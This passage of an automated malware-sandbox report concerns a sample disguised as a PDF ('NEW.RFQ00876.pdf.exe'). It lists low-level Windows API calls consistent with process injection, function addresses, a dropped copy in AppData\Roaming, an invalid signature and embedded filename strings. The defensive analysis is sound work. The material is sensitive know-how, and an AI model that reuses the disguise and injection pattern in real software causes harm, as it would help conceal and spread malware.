                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892AF0 NtWriteFile,15_2_01892AF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DB0 NtEnumerateKey,15_2_01892DB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892DD0 NtDelayExecution,15_2_01892DD0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D00 NtSetInformationFile,15_2_01892D00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D10 NtMapViewOfSection,15_2_01892D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892D30 NtUnmapViewOfSection,15_2_01892D30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CA0 NtQueryInformationToken,15_2_01892CA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CC0 NtQueryVirtualMemory,15_2_01892CC0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892CF0 NtOpenProcess,15_2_01892CF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C00 NtQueryInformationProcess,15_2_01892C00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892C60 NtCreateKey,15_2_01892C60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F90 NtProtectVirtualMemory,15_2_01892F90
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FA0 NtQuerySection,15_2_01892FA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FB0 NtResumeThread,15_2_01892FB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892FE0 NtCreateFile,15_2_01892FE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F30 NtCreateSection,15_2_01892F30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892F60 NtCreateProcessEx,15_2_01892F60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892E80 NtReadVirtualMemory,15_2_01892E80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892EA0 NtAdjustPrivilegesToken,15_2_01892EA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892EE0 NtQueueApcThread,15_2_01892EE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892E30 NtWriteVirtualMemory,15_2_01892E30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893090 NtSetValueKey,15_2_01893090
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893010 NtOpenDirectoryObject,15_2_01893010
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018939B0 NtGetContextThread,15_2_018939B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893D10 NtOpenProcessToken,15_2_01893D10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01893D70 NtOpenThread,15_2_01893D70
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_01B0DD140_2_01B0DD14
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B14800_2_058B1480
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B76C80_2_058B76C8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B00060_2_058B0006
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B00400_2_058B0040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058BF53F0_2_058BF53F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058BF5430_2_058BF543
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_058B76B80_2_058B76B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755B6A00_2_0755B6A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755A2980_2_0755A298
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755BF100_2_0755BF10
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07559E600_2_07559E60
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0755BAD80_2_0755BAD8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079DEE280_2_079DEE28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079D6C800_2_079D6C80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079DEE280_2_079DEE28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE03C80_2_07CE03C8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE27330_2_07CE2733
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C040D460_2_0C040D46
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C04A6E80_2_0C04A6E8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C0437100_2_0C043710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C0400400_2_0C040040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0C04A6C10_2_0C04A6C1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD14E80_2_0CCD14E8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD8AB00_2_0CCD8AB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD00400_2_0CCD0040
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD00060_2_0CCD0006
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD14E80_2_0CCD14E8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_00418A1315_2_00418A13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0042F06315_2_0042F063
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040301015_2_00403010
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040112015_2_00401120
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040127015_2_00401270
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0041027315_2_00410273
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040236415_2_00402364
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040236C15_2_0040236C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040237015_2_00402370
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_00416C1315_2_00416C13
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E48315_2_0040E483
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0041049315_2_00410493
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E5C715_2_0040E5C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E5D315_2_0040E5D3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0040E6A615_2_0040E6A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019201AA15_2_019201AA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019181CC15_2_019181CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185010015_2_01850100
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FA11815_2_018FA118
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E815815_2_018E8158
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F200015_2_018F2000
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019203E615_2_019203E6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E3F015_2_0186E3F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191A35215_2_0191A352
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E02C015_2_018E02C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190027415_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192059115_2_01920591
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186053515_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190E4F615_2_0190E4F6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191244615_2_01912446
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185C7C015_2_0185C7C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188475015_2_01884750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186077015_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187C6E015_2_0187C6E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A015_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192A9A615_2_0192A9A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187696215_2_01876962
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018468B815_2_018468B8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E8F015_2_0188E8F0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186284015_2_01862840
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186A84015_2_0186A840
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01916BD715_2_01916BD7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191AB4015_2_0191AB40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185EA8015_2_0185EA80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01878DBF15_2_01878DBF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185ADE015_2_0185ADE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186AD0015_2_0186AD00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900CB515_2_01900CB5
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850CF215_2_01850CF2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860C0015_2_01860C00
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DEFA015_2_018DEFA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852FC815_2_01852FC8
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186CFE015_2_0186CFE0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A2F2815_2_018A2F28
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880F3015_2_01880F30
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4F4015_2_018D4F40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191CE9315_2_0191CE93
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01872E9015_2_01872E90
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191EEDB15_2_0191EEDB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191EE2615_2_0191EE26
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860E5915_2_01860E59
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186B1B015_2_0186B1B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189516C15_2_0189516C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184F17215_2_0184F172
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0192B16B15_2_0192B16B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018670C015_2_018670C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190F0CC15_2_0190F0CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F0E015_2_0191F0E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019170E915_2_019170E9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A739A15_2_018A739A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191132D15_2_0191132D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184D34C15_2_0184D34C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018652A015_2_018652A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187B2C015_2_0187B2C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019012ED15_2_019012ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FD5B015_2_018FD5B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191757115_2_01917571
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F43F15_2_0191F43F
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185146015_2_01851460
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191F7B015_2_0191F7B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_019116CC15_2_019116CC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F591015_2_018F5910
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186995015_2_01869950
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187B95015_2_0187B950
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018638E015_2_018638E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CD80015_2_018CD800
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187FB8015_2_0187FB80
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0189DBF915_2_0189DBF9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D5BF015_2_018D5BF0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FB7615_2_0191FB76
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018FDAAC15_2_018FDAAC
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018A5AA015_2_018A5AA0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0190DAC615_2_0190DAC6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01917A4615_2_01917A46
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FA4915_2_0191FA49
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D3A6C15_2_018D3A6C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187FDC015_2_0187FDC0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01863D4015_2_01863D40
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01911D5A15_2_01911D5A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01917D7315_2_01917D73
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FCF215_2_0191FCF2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D9C3215_2_018D9C32
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01861F9215_2_01861F92
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FFB115_2_0191FFB1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191FF0915_2_0191FF09
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01869EB015_2_01869EB0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_00B6DD1420_2_00B6DD14
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_0524272820_2_05242728
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_052403C820_2_052403C8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1B6A020_2_06C1B6A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1A29820_2_06C1A298
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C19E6020_2_06C19E60
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1BF1020_2_06C1BF10
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_06C1BAD820_2_06C1BAD8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 20_2_0B41035A20_2_0B41035A
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103010023_2_01030100
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0108600023_2_01086000
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010C02C023_2_010C02C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104053523_2_01040535
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0106475023_2_01064750
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104077023_2_01040770
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103C7C023_2_0103C7C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105C6E023_2_0105C6E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105696223_2_01056962
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010429A023_2_010429A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104A84023_2_0104A840
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104284023_2_01042840
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107889023_2_01078890
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010268B823_2_010268B8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0106E8F023_2_0106E8F0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103EA8023_2_0103EA80
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104AD0023_2_0104AD00
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104ED7A23_2_0104ED7A
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01058DBF23_2_01058DBF
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01048DC023_2_01048DC0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103ADE023_2_0103ADE0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01040C0023_2_01040C00
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01030CF223_2_01030CF2
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01082F2823_2_01082F28
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01060F3023_2_01060F30
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B4F4023_2_010B4F40
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010BEFA023_2_010BEFA0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01032FC823_2_01032FC8
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01040E5923_2_01040E59
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01052E9023_2_01052E90
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107516C23_2_0107516C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0102F17223_2_0102F172
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104B1B023_2_0104B1B0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0102D34C23_2_0102D34C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010433F323_2_010433F3
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010452A023_2_010452A0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105B2C023_2_0105B2C0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105D2F023_2_0105D2F0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0103146023_2_01031460
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104349723_2_01043497
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010874E023_2_010874E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104B73023_2_0104B730
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104995023_2_01049950
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105B95023_2_0105B950
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0104599023_2_01045990
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010AD80023_2_010AD800
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010438E023_2_010438E0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105FB8023_2_0105FB80
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B5BF023_2_010B5BF0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0107DBF923_2_0107DBF9
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B3A6C23_2_010B3A6C
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01043D4023_2_01043D40
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_0105FDC023_2_0105FDC0
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01059C2023_2_01059C20
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_010B9C3223_2_010B9C32
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01041F9223_2_01041F92
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: 23_2_01049EB023_2_01049EB0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018A7E54 appears 100 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018DF290 appears 105 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 01895130 appears 57 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 018CEA12 appears 86 times
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: String function: 0184B970 appears 272 times
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: String function: 01087E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeCode function: String function: 010AEA12 appears 37 times
                Source: NEW.RFQ00876.pdf.exeStatic PE information: invalid certificate
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1306087920.0000000004359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1306087920.0000000004359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000000.1246174933.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1335729190.0000000005D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1340769027.0000000007560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaRrJg.exe. vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs NEW.RFQ00876.pdf.exe
                Source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1304672176.0000000003395000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs NEW.RFQ00876.pdf.exe
